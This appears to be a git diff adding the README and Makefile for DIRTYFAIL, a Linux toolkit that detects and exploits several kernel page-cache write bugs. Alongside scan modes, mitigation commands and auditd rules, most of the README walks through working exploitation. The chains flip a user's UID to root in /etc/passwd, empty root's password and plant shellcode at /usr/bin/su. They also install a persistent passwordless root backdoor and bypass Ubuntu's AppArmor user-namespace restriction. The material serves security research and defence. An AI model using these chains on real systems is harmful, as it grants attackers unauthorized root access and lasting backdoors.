β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ AA stage 1/2 β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ stage 1/2 β”‚ β”‚ unshare + caps β”‚ β”‚ AF_ALG ecb(aes) β”‚ + β”‚ handler β”‚ β”‚ β†’ run inner β”‚ β”‚ keystream brute β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ force β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + + Per-CVE primitives (each has detect/exploit/exploit_inner functions): + + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ copyfail.c algif_aead authencesn 4-byte STORE (CVE-2026-31431) β”‚ + β”‚ copyfail_gcm.c rfc4106(gcm(aes)) 1-byte STORE (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_esp.c xfrm-ESP IPv4 4-byte STORE (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_esp6.c xfrm-ESP IPv6 4-byte STORE w/ +9 (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_rxrpc.c rxkad 8-byte STORE + fcrypt brute (CVE-2026-43500) β”‚ + β”‚ fcrypt.c rxkad cipher (56-bit Feistel) β”‚ + β”‚ backdoor.c persistent /etc/passwd line overwrite β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ +``` + +**Key design decisions:** + +- **Outer/inner split**: every exploit forks a child for the kernel + work. Parent stays in init namespace so the eventual `execlp("su", + user)` reaches REAL init-ns root. See [Β§8.5 + Architecture](#85-architecture-outerinner-fork-based-bypass). +- **Page cache is global**: child writes from inside its bypass userns, + parent reads from init ns; same bytes visible. +- **Env vars carry parent β†’ child state**: `DIRTYFAIL_INNER_MODE`, + `DIRTYFAIL_TARGET_USER`, `DIRTYFAIL_K_{A,B,C}` (rxrpc), + `DIRTYFAIL_LINE_OFF` etc. (backdoor). `execv` preserves the + environment across stage transitions. +- **Defensive companion**: `--mitigate` deploys the same blacklists + + sysctl hardening that distros ship as official mitigations. + `--scan` detects when caps are LSM-blocked and reports + "mitigated" rather than misleading "VULNERABLE preconditions met". + +--- + +## 5. Build + +### Prerequisites + +* **Linux** (this binary is Linux-only at runtime). +* `gcc` or `clang`, `make`. +* Linux UAPI headers β€” specifically ``, ``, + ``, ``. + +| Distro | Install | +|-------------------|------------------------------------------------------| +| Debian / Ubuntu | `sudo apt install build-essential linux-libc-dev` | +| RHEL / CentOS | `sudo dnf install gcc make kernel-headers glibc-devel` | +| Fedora | `sudo dnf install gcc make kernel-headers` | +| Arch | `sudo pacman -S base-devel` | + +### Build commands + +```sh +git clone https://github.com//DIRTYFAIL.git +cd DIRTYFAIL +make # release build β†’ ./dirtyfail +make debug # -O0 -g3 for gdb +make static # static link (musl-gcc recommended) +make clean +``` + +The default build produces a single ~80 KB binary at `./dirtyfail`. +For a portable build that runs on any kernel-compatible Linux without +glibc dependency drift: + +```sh +make static CC=musl-gcc +``` + +(install `musl-tools` on Debian/Ubuntu, or build musl from source). + +--- + +## 6. Usage + +`./dirtyfail --help` is the canonical reference; the modes broken +out by category: + +**Detection (safe; no system modification):** + +| Mode | What it does | +|---|---| +| `--scan` | Run all five detectors (default mode) | +| `--scan --active` | Add a sentinel-file STORE probe per CVE β€” distinguishes preconds-met from actually-exploitable | +| `--scan --json` | Emit a single JSON object on stdout (SIEM-friendly); logs go to stderr | +| `--check-copyfail` / `--check-esp` / `--check-esp6` / `--check-rxrpc` / `--check-gcm` | Per-CVE detection only | + +**Exploitation (typed-confirmation gated; corrupts `/etc/passwd` page cache):** + +| Mode | What it does | +|---|---| +| `--exploit-copyfail` | UID flip via `algif_aead` 4-byte primitive | +| `--exploit-esp` | UID flip via xfrm-ESP v4 (needs userns+CAP_NET_ADMIN) | +| `--exploit-esp6` | UID flip via xfrm-ESP v6 | +| `--exploit-rxrpc` | Empty root password field via rxkad fcrypt brute force | +| `--exploit-gcm` | UID flip via `rfc4106(gcm(aes))` single-byte primitive | +| `--exploit-backdoor` | PERSISTENT: insert `dirtyfail::0:0:...:/:/bin/bash` | +| `--exploit-su` | V4bel-style: plant arch-specific shellcode at `/usr/bin/su` entry point. x86_64 tested end-to-end; aarch64 ships hardware-untested (gated behind `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`) | + +**Cleanup / state inspection:** + +| Mode | What it does | +|---|---| +| `--cleanup` | Evict `/etc/passwd` from page cache (`fadvise` + `drop_caches` if root) | +| `--cleanup-backdoor` | Restore the original `/etc/passwd` line from state file | +| `--cleanup-su` | Restore `/usr/bin/su` entry-point bytes from state file | +| `--list-state` | Report what (if anything) is currently planted; side-effect-free | + +**Defensive (root required):** + +| Mode | What it does | +|---|---| +| `--mitigate` | Blacklist `algif_aead`/`esp4`/`esp6`/`rxrpc` modules; set `apparmor_restrict_unprivileged_userns=1`; drop_caches. Side-effects: breaks IPsec, AFS | +| `--cleanup-mitigate` | Remove the modprobe/sysctl files installed by `--mitigate` | + +**Common options:** + +| Flag | Effect | +|---|---| +| `--no-shell` | After a successful exploit, do NOT `execve su` β€” verify and revert | +| `--no-revert` | With `--no-shell`, also skip the auto-revert (used by the container-escape demo) | +| `--active` | Add active sentinel-STORE probes to `--scan`/`--check-*` | +| `--json` | (with `--scan`) emit machine-readable output | +| `--no-color` | Disable ANSI color | +| `--aa-bypass` | (DEBUG only) force the AppArmor unprivileged-userns bypass β€” exploits do this internally, see Β§8.5 | + +### Detection examples + +Plain scan (preconditions only β€” fast, ~1s): + +```sh +./dirtyfail --scan +``` + +Active sentinel probe per CVE (~10s, modifies `/tmp` sentinels only): + +```sh +./dirtyfail --scan --active +``` + +JSON for SIEM/fleet ingestion: + +```sh +$ ./dirtyfail --scan --active --json +{ + "tool": "dirtyfail", + "version": "0.1.0", + "hostname": "server-01", + "kernel": "6.19.10-300.fc44.x86_64", + "machine": "x86_64", + "active_probes": true, + "results": [ + {"cve": "CVE-2026-31431", "name": "copyfail", "status": "vulnerable"}, + {"cve": "CVE-2026-43284", "name": "dirtyfrag-esp", "status": "vulnerable"}, + {"cve": "CVE-2026-43284-v6", "name": "dirtyfrag-esp6", "status": "vulnerable"}, + {"cve": "CVE-2026-43500", "name": "dirtyfrag-rxrpc", "status": "vulnerable"}, + {"cve": "CVE-2026-31431-gcm", "name": "copyfail-gcm", "status": "vulnerable"} + ], + "summary": "vulnerable" +} +``` + +Status values: `vulnerable`, `not_vulnerable`, `preconds_missing`, +`test_error`. The summary echoes the worst across results. + +### Exploit examples (typed confirmation required) + +```sh +./dirtyfail --exploit-copyfail # UID-flip + drop into root via su +./dirtyfail --exploit-su # plant /bin/sh shellcode at /usr/bin/su entry +./dirtyfail --exploit-copyfail --no-shell # plant + verify + auto-revert (CI-safe) +``` + +Each exploit prompts for `DIRTYFAIL` + (where applicable) +`YES_BREAK_SSH` before any page-cache modification. + +### State inspection + cleanup + +```sh +./dirtyfail --list-state # what's currently planted? (side-effect free) +./dirtyfail --cleanup # fadvise(DONTNEED) + drop_caches if root +./dirtyfail --cleanup-backdoor # restore /etc/passwd from .dirtyfail.state +./dirtyfail --cleanup-su # restore /usr/bin/su from .dirtyfail-su.state +``` + +Or fall through to the kernel directly: + +```sh +sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' +``` + +--- + +## 7. How DIRTYFAIL detects each CVE + +### Copy Fail (active sentinel probe) + +Detection actually triggers the primitive against a sentinel file in +`/tmp`: + +1. Probe `socket(AF_ALG, SOCK_SEQPACKET, 0)` and `bind` to + `authencesn(hmac(sha256), cbc(aes))`. +2. Create a 4 KiB sentinel file in `/tmp` and fault its first page + into the cache. +3. Run the full exploit primitive against it: `sendmsg` AAD with + `seqno_lo = "PWND"`, splice 32 bytes of the sentinel into the AF_ALG + op socket, drive `recv` to fire the scratch write. +4. Re-read the sentinel and look for `PWND` anywhere in the first + page. + +Marker found β‡’ vulnerable. Marker absent but page contents differ β‡’ +the primitive partially fired (still vulnerable). Page identical β‡’ +not vulnerable on this kernel. + +### Dirty Frag xfrm-ESP (precondition-based β€” or active with `--active`) + +Default `--scan` is precondition-only β€” we don't enter a user +namespace in detect mode (it would side-effect networking inside +that namespace). We check: + +* kernel version within affected window +* `esp4` / `esp6` currently loaded or autoloadable +* unprivileged user namespace creation succeeds (probed via fork β†’ + child `unshare(CLONE_NEWUSER)`) +* AppArmor `apparmor_userns_caps_blocked()` returns false + +All four present β‡’ VULNERABLE (preconditions met). + +`--scan --active` extends this with a sentinel-STORE probe: we fork +a child that arms the AA bypass, enters a fresh user/net namespace, +registers an XFRM SA, and fires the ESP-in-UDP trigger against a +`/tmp/dirtyfail-esp-probe.XXXXXX` sentinel file. The parent re-reads +the sentinel and looks for the marker bytes: + +* marker landed β†’ kernel STORE is reachable β†’ **VULNERABLE** +* page intact β†’ kernel patch is in effect β†’ **NOT VULNERABLE** +* AA bypass denied β†’ **PRECOND_FAIL** (LSM-mitigated) + +This is the only way to distinguish a backported-patched kernel +from an unpatched one without running the full UID-flip exploit +against `/etc/passwd`. The same pattern is used for ESP v6, RxRPC, +and GCM under `--active`. + +### Dirty Frag RxRPC (precondition-based β€” or active with `--active`) + +Preconditions: +* `rxrpc` in `/proc/modules` or autoloadable +* `socket(AF_RXRPC, SOCK_DGRAM, 0)` succeeds + +Active probe (`--active`): forks via AA bypass, registers an rxrpc +session key with an arbitrary 8-byte value, sends one CHALLENGE + +DATA forgery against a `/tmp` sentinel, looks for ANY byte change +inside the spliced 8-byte window. We don't try to predict what +landed β€” any modification confirms the kernel STORE fires. + +### Copy Fail GCM variant + ESP v6 β€” same shape + +The GCM variant active probe installs a transport-mode SA with an +arbitrary IV and fires `gcm_trigger` against a `/tmp` sentinel; ANY +byte change at sentinel[0] confirms reachability. The ESP v6 probe +also auto-calibrates `V6_STORE_SHIFT` per kernel build (see +`calibrate_v6_shift` in `src/dirtyfrag_esp6.c`) β€” different distros' +`esp6_input` builds put the STORE at slightly different offsets +inside the spliced region, and the calibration probe discovers the +exact offset before the real exploit fires. + +--- + +## 8. How DIRTYFAIL exploits each CVE + +### Copy Fail exploit (`copyfail.c`) + +Single 4-byte STORE through `algif_aead`: + +``` + [/etc/passwd page cache] + user ──sendmsg(AAD = SPI||"0000")──▢ AF_ALG op + ──splice(passwd_fd, 32B)──────▢ AF_ALG op (in-place dst SGL) + ──recv()─────────────────────▢ kernel runs authencesn_decrypt + scratch write: "0000" β†’ uid_off + EBADMSG returned to user (we ignore) + user ──open(passwd, RDONLY)─read──▢ "kara:x:0000:1000:..." ◄─ page cache + user ──execlp("su", "kara")──────▢ PAM βœ“ on /etc/shadow β†’ setuid(0) + ─────► root shell +``` + +### Dirty Frag xfrm-ESP exploit (`dirtyfrag_esp.c`) + +Same end-state as Copy Fail, reached through `xfrm_input` instead of +`algif_aead`: + +``` + [/etc/passwd page cache] + unshare(USER|NET); setup uid_map; ifup lo + NETLINK_XFRM ─NEWSA(seq_hi="0000", encap=ESPINUDP/4500)─▢ kernel + udp_recv bind 127.0.0.1:4500, UDP_ENCAP_ESPINUDP + udp_send connect 127.0.0.1:4500 + vmsplice ESP wire header (24B) ─▢ pipe + splice /etc/passwd@uid_off (16B) ─▢ pipe + splice pipe (40B) ─▢ udp_send + udp loopback ─▢ udp_recv (UDP_ENCAP) ─▢ xfrm_input ─▢ esp_input + skb has frags, no frag_list ─▢ goto skip_cow (THE BUG) + crypto_authenc_esn_decrypt: + scratch_write(seq_hi="0000" β†’ page_addr+uid_off) ◄─ 4-byte STORE + AEAD auth fails (EBADMSG) β€” but the STORE is permanent + page-cache copy of /etc/passwd now reports uid 0 for the user +``` + +Then exit the namespace, `execlp("su", user)` from the parent β€” same +final step as Copy Fail. + +### Dirty Frag RxRPC exploit (`dirtyfrag_rxrpc.c` + `fcrypt.c`) + +``` + [/etc/passwd page cache] + user-space brute force of K_A, K_B, K_C such that fcrypt_decrypt(C, K) + produces predicate-satisfying plaintexts for offsets 4, 6, 8 + (chained-ciphertext correction across passes) + + fork β†’ child enters new userns: + unshare(USER|NET); setup uid_map; ifup lo + socket(AF_RXRPC) β€” autoload rxrpc.ko + for each (off, K) in [(4,K_A), (6,K_B), (8,K_C)]: + add_key("rxrpc", "df-evil", v1_token{session_key=K}) + udp_srv = bind 127.0.0.1:port_S + rxsk = AF_RXRPC + SECURITY_KEY=df-evil + bind :port_C + rxsk β†’ sendmsg(PINGPING) triggers handshake init + udp_srv ← receives kernel's first DATA-0 + extract (epoch, cid, callNumber) + udp_srv β†’ forged CHALLENGE β†’ rxsk auto-RESPONSE + primes conn->rxkad.cipher with K + csum_iv = AF_ALG pcbc(fcrypt)(epoch||cid||0||sec_ix, IV=K) + cksum_h = AF_ALG pcbc(fcrypt)(call_id||x, IV=csum_iv)[1] >> 16 + vmsplice DATA hdr (28B) β†’ pipe + splice /etc/passwd@off (8B) β†’ pipe + splice pipe (36B) β†’ udp_srv + udp loopback β†’ rxsk + recvmsg β†’ rxrpc_input β†’ rxkad_verify_packet + skb has frags, no frag_list β†’ goto skip_unshare (THE BUG) + skcipher_request_set_crypt(req, sg=page+off, sg=page+off, 8, iv=0) + crypto_skcipher_decrypt: pcbc(fcrypt) + page[off..off+8] = fcrypt_decrypt(C_actual, K) ◄─ 8-byte STORE + + child exits, parent verifies /etc/passwd[4..5] == "::" + parent: execlp("su", "-") + PAM common-auth: pam_unix.so nullok β†’ root has empty password + su β†’ setresuid(0,0,0) β†’ exec /bin/bash + ─────► root shell +``` + +### `--exploit-su` shellcode injection (`exploit_su.c`) + +A second `/etc/passwd`-free attack chain modeled on V4bel's reference +exploit. Instead of editing `/etc/passwd`'s page cache, we plant +arch-specific shellcode at `/usr/bin/su`'s ELF entry point in its +page cache; the next time anyone exec's `/usr/bin/su`, the kernel +sets euid=0 from the on-disk setuid bit, the dynamic linker +resolves, and control transfers to our shellcode β†’ `/bin/sh` as +real init-ns root. No PAM dependency, bypasses `pam_unix nullok` +removal entirely. + +``` +parent (init ns) + β”‚ stat /usr/bin/su; verify setuid+root + β”‚ parse ELF header; resolve e_entry β†’ file offset + β”‚ pread() N bytes at file_offset β†’ /var/tmp/.dirtyfail-su.state + β”‚ for each 4-byte chunk of shellcode: + β”‚ cf_4byte_write("/usr/bin/su", file_offset+i, chunk) + β”‚ pread() back; verify match + β”‚ if --no-shell: + β”‚ plant_shellcode(original) # revert via re-write + β”‚ fadvise(DONTNEED) on a new fd # evict if possible + β”‚ else: + β”‚ execl("/usr/bin/su", "su", NULL) ─► + β”‚ kernel exec /usr/bin/su (setuid root) + β”‚ ld-linux.so resolves + β”‚ jumps to e_entry β†’ our shellcode + β”‚ setuid(0); setgid(0); + β”‚ execve("/bin/sh", argv, NULL) + β–Ό ────► root shell +``` + +Architecture matrix: + +* **x86_64 (56 bytes, 14 chained 4-byte writes)** β€” tested + end-to-end on Fedora 44 (`uid=0(root) gid=0(root) ... + context=unconfined_u:unconfined_r:unconfined_t`). Shellcode in + `shellcode_x86_64[]`. +* **aarch64 (80 bytes, 20 instructions)** β€” hand-encoded from the + ARMv8-A reference, **never executed on hardware**. Gated behind + `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`. Source ships in + `tools/exploit_su_aarch64.S` for community verification β€” assemble + with `aarch64-linux-gnu-as` and confirm the byte sequence matches + `shellcode_aarch64[]`. +* anything else β†’ preconds_fail. + +The state file `/var/tmp/.dirtyfail-su.state` stashes the original +entry-point bytes so `--cleanup-su` can restore. `--list-state` +inspects this file (and the backdoor's) without touching anything. + +If the verify step finds the page cache doesn't match the planted +shellcode (kernel patched, AF_ALG blacklisted, etc.), the auto-revert +fires immediately and the state file is removed β€” no need for the +operator to run cleanup-su afterward. + +--- + +## 8.5 Architecture: outer/inner fork-based bypass + +All five exploit modes share a common architecture for handling +Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy without +trapping the post-exploit `su` inside a userns where it can't reach +real init-ns root. + +### The problem + +A naive bypass puts the *whole* `dirtyfail` process inside a fresh +user namespace via `unshare(CLONE_NEWUSER)`. That's enough to register +XFRM SAs and fire splice triggers β€” but it also means the eventual +`execlp("su", user)` runs inside the userns, where uid 0 is mapped via +`uid_map "0 1000 1"` to the operator's outer uid (1000). PAM's +`setresuid(0)` then lands at userns-uid-0-mapped-to-1000, which is +**not** real init-ns root β€” `cat /etc/shadow` returns EACCES, the +shell can't actually do privileged operations. + +### The fix: outer/inner split + +``` +parent (dirtyfail, init ns) child (bypass userns) +───────────────────────── ───────────────────── +prompts (DIRTYFAIL / YES_BREAK_SSH) +resolve target (uid_off, K_A/K_B/K_C, ...) +setenv DIRTYFAIL_INNER_MODE=... +setenv DIRTYFAIL_TARGET_USER=... +fork ─────────────────────────────────────► change_onexec("crun") + execv self ─► STAGE-1 + execv self ─► STAGE-2 + unshare(USER|NET) + uid_map / capset + ifup lo + main() detects INNER_MODE + dispatch _inner() + register XFRM SA + splice trigger β†’ page cache STORE + _exit(DF_EXPLOIT_OK) +waitpid ◄───────────────────────────────── (child reaped) +read /etc/passwd (page cache is global) +verify modification visible +if do_shell: + execlp("su", user) ← runs IN INIT NS + PAM auth β†’ setresuid(0) + β†’ REAL init-ns root shell +else: + try_revert_passwd_page_cache +``` + +The parent **never enters a user namespace**. The child does the +bypass + kernel work, modifies the global page cache (which is shared +across namespaces β€” the only "bridge" we need), and exits. The +parent's `su` is then a normal init-namespace setresuid call. + +### Parent β†’ child handoff via env vars + +`execv` preserves the environment, so the parent stashes the +operation parameters in env vars before forking. Each mode defines +its own: + +| Mode | Env vars | +|---|---| +| `esp` / `esp6` / `gcm` | `DIRTYFAIL_INNER_MODE`, `DIRTYFAIL_TARGET_USER` | +| `rxrpc` | `DIRTYFAIL_INNER_MODE=rxrpc`, `DIRTYFAIL_K_{A,B,C}` (hex) β€” fcrypt brute force happens in the parent (no caps needed); the keys are passed to the child for the actual triggers | +| `backdoor-install` / `backdoor-cleanup` | `DIRTYFAIL_INNER_MODE`, `DIRTYFAIL_LINE_OFF`, `VICTIM_LINE`, `TARGET_LINE` | + +After stage 2 of the bypass completes, `main()` checks +`DIRTYFAIL_INNER_MODE` and dispatches to `_exploit_inner()`. The +inner does *only* the kernel work (no prompts, no fork, no `su`) and +exits with the result code. The parent reaps it via `waitpid` and +proceeds with verification. + +### Why the single-hop bypass + +The earlier two-hop dance (`change_onexec("crun")` β†’ `change_onexec("chrome")`) +caused intermittent `ENOSPC` failures on Ubuntu 24.04 in our exec +chain (likely a per-profile userns-accounting wrinkle). The single +hop into `crun` is sufficient β€” `crun`'s AppArmor profile has +`flags=(unconfined)` and explicit `userns,` permission, so unshare +succeeds and stays succeeded. + +### Why no infinite re-exec loop + +After stage 2 completes successfully, a process-local +`g_bypass_done` flag is set. If `apparmor_bypass_needed()` is called +again in the same process, it short-circuits to `false`, preventing +the post-exploit code from re-arming and nesting another userns +layer (which previously hit the per-userns nesting cap as `ENOSPC`). + +### `--aa-bypass` is now a debug-only flag + +In the old architecture, `--aa-bypass` armed a whole-process bypass +before the exploit dispatch. In the new architecture, exploit modes +do their *own* fork-based bypass internally; the flag is no longer +needed for normal use. It's retained for debugging the bypass +mechanics in isolation (e.g. running `--scan` inside a bypass +userns), with a warning that it may break post-exploit `su`. + +--- + +## 9. Mitigations + +### Copy Fail (CVE-2026-31431) + +1. **Apply the patch.** Mainline `a664bf3d`; backports landed on the + 6.12 / 6.17 / 6.18 stable lines. +2. **Interim**: blacklist `algif_aead`: + ```sh + echo 'install algif_aead /bin/false' | sudo tee /etc/modprobe.d/copyfail.conf + sudo rmmod algif_aead 2>/dev/null + ``` + ⚠ Note: this **does not** mitigate Dirty Frag. The xfrm-ESP path + reaches the same authencesn primitive without going through + algif_aead. + +### Dirty Frag xfrm-ESP (CVE-2026-43284) + +1. **Apply the patch.** Mainline `f4c50a4034e6` (merged 2026-05-07). + Distro backports rolling out as of 2026-05-08. +2. **Interim**: blacklist `esp4` and `esp6`: + ```sh + sudo tee /etc/modprobe.d/dirtyfrag-esp.conf <<'EOF' + install esp4 /bin/false + install esp6 /bin/false + EOF + sudo rmmod esp4 esp6 2>/dev/null + sudo sysctl vm.drop_caches=3 + ``` + ⚠ This breaks IPsec / strongSwan / libreswan VPNs. +3. **Defense in depth**: disallow unprivileged user namespaces. + Ubuntu does this by default via AppArmor; on other distros: + ```sh + sudo sysctl -w kernel.unprivileged_userns_clone=0 + ``` + +### Dirty Frag RxRPC (CVE-2026-43500) + +1. **No upstream patch yet.** Researcher patch on lkml; not merged at + time of writing (2026-05-08). +2. **Interim**: blacklist `rxrpc`: + ```sh + sudo tee /etc/modprobe.d/dirtyfrag-rxrpc.conf <<'EOF' + install rxrpc /bin/false + EOF + sudo rmmod rxrpc 2>/dev/null + sudo sysctl vm.drop_caches=3 + ``` + ⚠ This breaks AFS distributed file system clients. Most servers + don't need rxrpc. + +### Combined one-liner (all three) + +```sh +sudo sh -c ' +cat > /etc/modprobe.d/dirtyfail.conf </dev/null +sysctl vm.drop_caches=3 +' +``` + +### Or use `dirtyfail --mitigate` + +The same set of mitigations is wrapped in a typed-confirmation gated +defensive mode: + +```sh +sudo ./dirtyfail --mitigate +``` + +This drops in `/etc/modprobe.d/dirtyfail-mitigations.conf` and +`/etc/sysctl.d/99-dirtyfail-mitigations.conf`, unloads the four +modules, and `drop_caches`. Reverts via `sudo ./dirtyfail +--cleanup-mitigate`. Side-effects: breaks IPsec, AFS clients, and +any userspace using `AF_ALG` AEAD. See `docs/DEFENDERS.md` for the +full sysadmin playbook. + +### Detection / monitoring + +For ongoing detection independent of patching: + +* **Scan a host:** `dirtyfail --scan --active` (full sentinel-STORE + probe) or `dirtyfail --scan --active --json` for SIEM/fleet + ingestion. The `tools/dirtyfail-check.sh` bash variant has zero + build dependencies. +* **Audit rules:** `tools/99-dirtyfail.rules` is a drop-in auditd + ruleset covering the five syscall paths the exploit chain uses + (XFRM netlink registration, `add_key("rxrpc")`, + `unshare(CLONE_NEWUSER)`, `AF_ALG` socket creation, + `/etc/passwd`/`/etc/shadow` writes). Install with: + ```sh + sudo install -m 0640 tools/99-dirtyfail.rules /etc/audit/rules.d/ + sudo augenrules --load && sudo systemctl restart auditd + ``` +* **Container blast-radius demo:** + `tools/dirtyfail-container-escape.sh` shows that the kernel page + cache is shared across namespaces β€” useful for explaining the + cross-tenant impact to operators. + +--- + +## 10. Ethics & disclosure + +DIRTYFAIL is a research tool. The vulnerabilities it covers are +**already publicly disclosed** with weaponized PoCs in the wild +(see [Credits](#11-credits)) β€” DIRTYFAIL adds detection coverage, +unified documentation, and a gentler PoC variant (UID-flip vs ELF +overwrite of `/usr/bin/su`). + +* **Do not run `--exploit-*` modes on systems you do not own or are + not explicitly authorized to test.** Page-cache modifications are + reversible with `drop_caches`, but they are still privilege + escalation while they persist. +* **Do not deploy DIRTYFAIL as a "scanner" against third-party + infrastructure** without written authorization. The detection mode + is non-modifying for system files but does open a sentinel file in + `/tmp` and exercise the kernel crypto API. +* If you find a vulnerable system in the wild, follow responsible + disclosure to the operator, not the public. + +--- + +## Bonus: notes on the GCM variant + backdoor + AppArmor bypass + +These three features extend DIRTYFAIL with techniques first published +by **0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo**. Reimplemented +in DIRTYFAIL style; original credit lives in `NOTICE.md`. + +### Copy Fail GCM variant + +Same xfrm-ESP no-COW path as CVE-2026-43284, but using +`rfc4106(gcm(aes))` instead of `authencesn(...)`. Two reasons it's +worth shipping alongside the authencesn variant: + +1. **Coverage.** A defender who blacklisted `algif_aead` to mitigate + Copy Fail (CVE-2026-31431) is still vulnerable here β€” the GCM + path doesn't go through algif_aead. +2. **Granularity.** AES-GCM in counter mode XORs keystream onto the + spliced byte. By brute-forcing the IV (~256 trials per byte) we + land an arbitrary single byte at any file offset β€” no 4-byte + alignment, no 4-byte side-effects. + +The 1-byte primitive (`cfg_1byte_write`) is what makes the persistent +backdoor mode feasible. + +### Persistent backdoor + +`--exploit-backdoor` picks the longest `/etc/passwd` line whose shell +is in `{nologin, false, sync}` and overwrites it byte-by-byte with +`dirtyfail::0:0::/:/bin/bash` (length-matched). After installation, +`su - dirtyfail` from any user drops a root shell β€” no password prompt β€” +because `pam_unix.so nullok` accepts the empty password field. + +The username `dirtyfail` is intentionally branded to this project so +it's *easy to detect* in any subsequent audit β€” defenders running +`grep dirtyfail /etc/passwd` (or any HIDS doing the same) will spot +the line immediately. If you need a different identifier for a +specific red-team engagement, change `NEW_USER` and `DF_PREFIX` in +`src/backdoor.c`. + +The on-disk file is unchanged; the substitution lives in the page +cache only. `--cleanup-backdoor` restores the original line via the +same primitive. + +### AppArmor bypass + +Ubuntu 24.04+ ships `apparmor_restrict_unprivileged_userns=1`. The +default profile applied to unprivileged binaries lets `unshare(USER)` +succeed but **strips CAP_NET_ADMIN** in the new namespace. XFRM SA +registration then fails silently. + +The bypass: write `"exec crun"` to `/proc/self/attr/exec` and +`execv` to switch into AppArmor's `crun` profile, which has +`flags=(unconfined)` and explicit `userns,` permission. After the +exec, `unshare(CLONE_NEWUSER | CLONE_NEWNET)` succeeds with full +caps inside the new namespace. + +DIRTYFAIL handles this *per-exploit-mode* via a fork: parent stays +in init namespace, child does the bypass + kernel work, parent +reads global page cache and runs `su` for real init-ns root. See +[Β§8.5 Architecture](#85-architecture-outerinner-fork-based-bypass) +for the full chain. The legacy `--aa-bypass` flag (which armed the +bypass for the whole process) is retained for debugging only. + +The original technique is from `aa-rootns.c` by 0xdeadbeefnetwork +(credited there to Brad Spengler / grsecurity). DIRTYFAIL's +implementation: + +- Detects the restriction via the + `kernel.apparmor_restrict_unprivileged_userns` sysctl rather than + by reading `/proc/self/attr/current` (which still shows + "unconfined" on Ubuntu 24.04 even when the policy is restricting). +- Uses a single hop into `crun` rather than the two-hop + `crun β†’ chrome` dance β€” the second hop caused intermittent + `ENOSPC` on Ubuntu 24.04. +- Sets a process-local `g_bypass_done` flag after stage 2 so re-checks + short-circuit (preventing infinite re-exec loops that previously + exhausted the per-userns nesting cap). + +--- + +## 11. Credits + +DIRTYFAIL is original code, but the techniques it implements were +developed by the researchers below. Read their primary sources before +deploying this tool β€” they are the canonical references. + +| Source | Researcher | Contribution | +|--------|------------|--------------| +| | Anonymous | Original Copy Fail disclosure | +| | Smarttfoxx | C PoC (shellcode-in-`su` variant) | +| | rootsecdev | Python detector + UID-flip PoC; the ergonomics of DIRTYFAIL's `--exploit-copyfail` mode follow this approach. | +| | Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) | Dirty Frag discovery, full chain PoC, kernel patches | +| | 0xdeadbeefnetwork | GCM-variant exploit, IPv6 PoC, AppArmor userns bypass technique | +| | BleepingComputer | Public reporting | + +Patch authors: + +* `f4c50a4034e6` (Dirty Frag xfrm-ESP) β€” based on Hyunwoo Kim's v1 + patch, with the merged shared-frag approach by Kuan-Ting Chen. +* RxRPC patch β€” Hyunwoo Kim, pending merge. + +--- + +## License + +MIT. See [LICENSE](LICENSE). + +--- + +## Contact + +Open an issue on this repository, or reach out at the address listed +in the commit history. For coordinated disclosure of related issues, +contact the upstream researchers above directly. diff --git a/modules/copy_fail_family/Makefile b/modules/copy_fail_family/Makefile new file mode 100644 index 0000000..517f63a --- /dev/null +++ b/modules/copy_fail_family/Makefile @@ -0,0 +1,93 @@ +# DIRTYFAIL β€” Makefile +# +# Builds a single statically-linked binary `dirtyfail` from src/*.c. +# +# Targets: +# make build optimized binary +# make debug build with -O0 -g for gdb +# make static build a fully static binary (musl recommended for portability) +# make clean remove build artifacts +# make scan build and run --scan against localhost +# +# Build prerequisites: gcc or clang, make, libc headers including +# . On Debian/Ubuntu: `apt install build-essential linux-libc-dev`. +# On RHEL/Fedora: `dnf install gcc make kernel-headers`. + +CC ?= gcc +CFLAGS ?= -O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith \ + -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 +LDFLAGS ?= + +SRC_DIR := src +BUILD := build +SOURCES := $(wildcard $(SRC_DIR)/*.c) +OBJECTS := $(patsubst $(SRC_DIR)/%.c,$(BUILD)/%.o,$(SOURCES)) +BIN := dirtyfail + +.PHONY: all debug static clean scan install test test-fcrypt test-aes-ecb + +all: $(BIN) + +# === Tests =========================================================== +# +# make test build + run all primitive selftests +# make test-fcrypt just fcrypt (cipher, brute force) β€” runs anywhere +# make test-aes-ecb AF_ALG ecb(aes) round-trip β€” Linux only +# +# Tests live in tests/, build standalone executables that link the +# minimum from src/. They don't pull in netlink / xfrm / rxrpc β€” those +# require root or AA bypass to exercise meaningfully and are tested +# end-to-end via `--exploit-* --no-shell` on a target host instead. + +TEST_DIR := tests +TEST_BUILD:= 